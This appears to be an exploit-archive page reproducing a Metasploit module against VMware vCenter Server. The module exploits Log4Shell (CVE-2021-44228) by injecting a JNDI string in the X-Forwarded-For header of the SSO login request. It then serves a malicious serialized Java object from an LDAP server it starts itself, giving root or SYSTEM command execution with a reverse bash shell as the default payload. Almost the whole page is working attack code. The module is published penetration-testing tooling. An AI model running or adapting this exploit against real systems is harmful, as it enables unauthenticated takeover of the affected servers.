VMware vCenter Server Unauthenticated Log4Shell JNDI Injection Remote Code Execution

2022.01.20
Credit: Spencer McIntyre
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::JndiInjection include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::CheckModule prepend Msf::Exploit::Remote::AutoCheck def initialize(_info = {}) super( 'Name' => 'VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)', 'Description' => %q{ VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows. This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page vector. }, 'Author' => [ 'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff 'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff 'jbaines-r7', # vCenter research 'w3bd3vil' # vCenter PoC https://twitter.com/w3bd3vil/status/1469814463414951937 ], 'References' => [ [ 'CVE', '2021-44228' ], [ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0028.html' ], [ 'URL', 'https://twitter.com/w3bd3vil/status/1469814463414951937' ] ], 'DisclosureDate' => '2021-12-09', 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'SRVPORT' => 389, 'WfsDelay' => 30, 'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner' }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' }, ], [ 'Linux', { 'Platform' => 'unix', 'Arch' => [ARCH_CMD], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }, ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'AKA' => ['Log4Shell', 'LogJam'], 'Reliability' => [REPEATABLE_SESSION], 'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner', 'exploit/multi/http/log4shell_header_injection' ] } ) register_options([ OptString.new('TARGETURI', [ true, 'Base path', '/']) ]) end def check validate_configuration! return Exploit::CheckCode::Unknown if tenant.nil? super end def check_options { 'LDAP_TIMEOUT' => datastore['WfsDelay'], 'HTTP_HEADER' => 'X-Forwarded-For', 'TARGETURI' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=', 'HEADERS_FILE' => nil, 'URIS_FILE' => nil } end def build_ldap_search_response_payload return [] if @search_received @search_received = true print_good('Delivering the serialized Java object to execute the payload...') build_ldap_search_response_payload_inline('BeanFactory') end def tenant return @tenant unless @tenant.nil? res = send_request_cgi('uri' => normalize_uri(target_uri, 'ui', 'login')) return nil unless res&.code == 302 return nil unless res.headers['Location'] =~ %r{websso/SAML2/SSO/([^/]+)\?} @tenant = Regexp.last_match(1) end def trigger @search_received = false # HTTP request initiator send_request_cgi( 'uri' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=', 'headers' => { 'X-Forwarded-For' => jndi_string } ) end def exploit validate_configuration! start_service trigger sleep(datastore['WfsDelay']) handler ensure cleanup end end


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top